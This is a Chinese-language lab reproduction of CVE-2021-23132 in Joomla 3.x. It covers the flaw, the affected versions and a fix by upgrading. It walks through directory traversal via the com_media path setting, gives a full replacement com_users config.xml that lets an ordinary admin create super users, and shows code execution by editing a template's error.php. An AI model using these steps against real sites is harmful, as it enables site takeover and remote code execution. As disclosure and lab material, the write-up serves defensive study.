0x01 描述
Joomla是一套知名的內容管理系統,其使用PHP語言和 MySQL數據庫開發,可以在Linux、 Windows、MacOSX等各種不同的平台上運行
在Joomla 3.0.0到3.9.24版本中,Joomla!的com_media組件配置允許被任意修改導致Web級別目錄遍歷,攻擊者通過一系列操作,進一步會導致遠程命令執行。
0x02 漏洞編號
CVE-2021-23132
0x03 漏洞等級
CVSS:7.5
威脅等級:高危````
0x04 影響范圍
3.0.0 <= Joomla! <= 3.9.24
0x05 公開POC
https://github.com/HoangKien1020/CVE-2021-23132
0x06 漏洞復現
環境搭建
使用VULFOCUS靶場,一鍵拉取鏡像
以普通管理員身份登錄系統。切換到“media”
點擊“option”,修改Path to Files Folder路徑為當前路徑“./”
可以看到這里可以操作整個web目錄下的文件夾及文件,實現了目錄遍歷。
在/administrator/components/com_users下,刪除config.xml文件
並重新上傳config.xml文件,內容如下
<?xml version="1.0" encoding="utf-8"?>
<config>
<fieldset
name="user_options"
label="COM_USERS_CONFIG_USER_OPTIONS" >
<field
name="allowUserRegistration"
type="radio"
label="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_LABEL"
description="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_DESC"
class="btn-group btn-group-yesno"
default="1"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="new_usertype"
type="usergrouplist"
label="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_LABEL"
description="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_DESC"
default="2"
checksuperusergroup="0"
/>
<field
name="guest_usergroup"
type="usergrouplist"
label="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_LABEL"
description="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_DESC"
default="1"
checksuperusergroup="0"
/>
<field
name="sendpassword"
type="radio"
label="COM_USERS_CONFIG_FIELD_SENDPASSWORD_LABEL"
description="COM_USERS_CONFIG_FIELD_SENDPASSWORD_DESC"
class="btn-group btn-group-yesno"
default="1"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="useractivation"
type="list"
label="COM_USERS_CONFIG_FIELD_USERACTIVATION_LABEL"
description="COM_USERS_CONFIG_FIELD_USERACTIVATION_DESC"
default="0"
>
<option value="0">JNONE</option>
<option value="1">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_SELFACTIVATION</option>
<option value="2">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_ADMINACTIVATION</option>
</field>
<field
name="mail_to_admin"
type="radio"
label="COM_USERS_CONFIG_FIELD_MAILTOADMIN_LABEL"
description="COM_USERS_CONFIG_FIELD_MAILTOADMIN_DESC"
class="btn-group btn-group-yesno"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="captcha"
type="plugins"
label="COM_USERS_CONFIG_FIELD_CAPTCHA_LABEL"
description="COM_USERS_CONFIG_FIELD_CAPTCHA_DESC"
folder="captcha"
filter="cmd"
useglobal="true"
>
<option value="0">JOPTION_DO_NOT_USE</option>
</field>
<field
name="frontend_userparams"
type="radio"
label="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_LABEL"
description="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_DESC"
class="btn-group btn-group-yesno"
default="1"
>
<option value="1">JSHOW</option>
<option value="0">JHIDE</option>
</field>
<field
name="site_language"
type="radio"
label="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_LABEL"
description="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_DESC"
class="btn-group btn-group-yesno"
default="0"
showon="frontend_userparams:1"
>
<option value="1">JSHOW</option>
<option value="0">JHIDE</option>
</field>
<field
name="change_login_name"
type="radio"
label="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_LABEL"
description="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_DESC"
class="btn-group btn-group-yesno"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>
<fieldset
name="domain_options"
label="COM_USERS_CONFIG_DOMAIN_OPTIONS"
>
<field
name="domains"
type="subform"
label="COM_USERS_CONFIG_FIELD_DOMAINS_LABEL"
description="COM_USERS_CONFIG_FIELD_DOMAINS_DESC"
multiple="true"
layout="joomla.form.field.subform.repeatable-table"
formsource="administrator/components/com_users/models/forms/config_domain.xml"
/>
</fieldset>
<fieldset
name="password_options"
label="COM_USERS_CONFIG_PASSWORD_OPTIONS" >
<field
name="reset_count"
type="integer"
label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_LABEL"
description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_DESC"
first="0"
last="20"
step="1"
default="10"
/>
<field
name="reset_time"
type="integer"
label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_LABEL"
description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_DESC"
first="1"
last="24"
step="1"
default="1"
/>
<field
name="minimum_length"
type="integer"
label="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH"
description="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH_DESC"
first="4"
last="99"
step="1"
default="4"
/>
<field
name="minimum_integers"
type="integer"
label="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS"
description="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS_DESC"
first="0"
last="98"
step="1"
default="0"
/>
<field
name="minimum_symbols"
type="integer"
label="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS"
description="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS_DESC"
first="0"
last="98"
step="1"
default="0"
/>
<field
name="minimum_uppercase"
type="integer"
label="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE"
description="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE_DESC"
first="0"
last="98"
step="1"
default="0"
/>
<field
name="minimum_lowercase"
type="integer"
label="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE"
description="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE_DESC"
first="0"
last="98"
step="1"
default="0"
/>
</fieldset>
<fieldset
name="user_notes_history"
label="COM_USERS_CONFIG_FIELD_NOTES_HISTORY" >
<field
name="save_history"
type="radio"
label="JGLOBAL_SAVE_HISTORY_OPTIONS_LABEL"
description="JGLOBAL_SAVE_HISTORY_OPTIONS_DESC"
class="btn-group btn-group-yesno"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="history_limit"
type="number"
label="JGLOBAL_HISTORY_LIMIT_OPTIONS_LABEL"
description="JGLOBAL_HISTORY_LIMIT_OPTIONS_DESC"
filter="integer"
default="5"
showon="save_history:1"
/>
</fieldset>
<fieldset
name="massmail"
label="COM_USERS_MASS_MAIL"
description="COM_USERS_MASS_MAIL_DESC">
<field
name="mailSubjectPrefix"
type="text"
label="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_LABEL"
description="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_DESC"
/>
<field
name="mailBodySuffix"
type="textarea"
label="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_LABEL"
description="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_DESC"
rows="5"
cols="30"
/>
</fieldset>
<fieldset
name="debug"
label="COM_USERS_DEBUG_LABEL"
description="COM_USERS_DEBUG_DESC">
<field
name="debugUsers"
type="radio"
label="COM_USERS_DEBUG_USERS_LABEL"
description="COM_USERS_DEBUG_USERS_DESC"
class="btn-group btn-group-yesno"
default="1"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="debugGroups"
type="radio"
label="COM_USERS_DEBUG_GROUPS_LABEL"
description="COM_USERS_DEBUG_GROUPS_DESC"
class="btn-group btn-group-yesno"
default="1"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>
<fieldset name="integration"
label="JGLOBAL_INTEGRATION_LABEL"
description="COM_USERS_CONFIG_INTEGRATION_SETTINGS_DESC"
>
<field
name="integration_sef"
type="note"
label="JGLOBAL_SEF_TITLE"
/>
<field
name="sef_advanced"
type="radio"
class="btn-group btn-group-yesno btn-group-reversed"
default="0"
label="JGLOBAL_SEF_ADVANCED_LABEL"
description="JGLOBAL_SEF_ADVANCED_DESC"
filter="integer"
>
<option value="0">JGLOBAL_SEF_ADVANCED_LEGACY</option>
<option value="1">JGLOBAL_SEF_ADVANCED_MODERN</option>
</field>
<field
name="integration_customfields"
type="note"
label="JGLOBAL_FIELDS_TITLE"
/>
<field
name="custom_fields_enable"
type="radio"
label="JGLOBAL_CUSTOM_FIELDS_ENABLE_LABEL"
description="JGLOBAL_CUSTOM_FIELDS_ENABLE_DESC"
class="btn-group btn-group-yesno"
default="1"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>
<fieldset
name="permissions"
label="JCONFIG_PERMISSIONS_LABEL"
description="JCONFIG_PERMISSIONS_DESC"
>
<field
name="rules"
type="rules"
label="JCONFIG_PERMISSIONS_LABEL"
filter="rules"
validate="rules"
component="com_users"
section="component"
/>
</fieldset>
</config>
添加新用戶,可以看到,能直接添加超級管理員權限的用戶
使用超級管理員用戶,修改Beez3模板的error.php文件
添加語句phpinfo();
訪問http://localhost/templates/beez3/error.php,實現代碼執行
也可以使用POC來執行代碼
獲取Flag
0x06 修復建議
建議相關用戶升級到3.9.25及以上版本。或者登陸系統后台,系統會提示升級,點擊一下完成自動升級即可。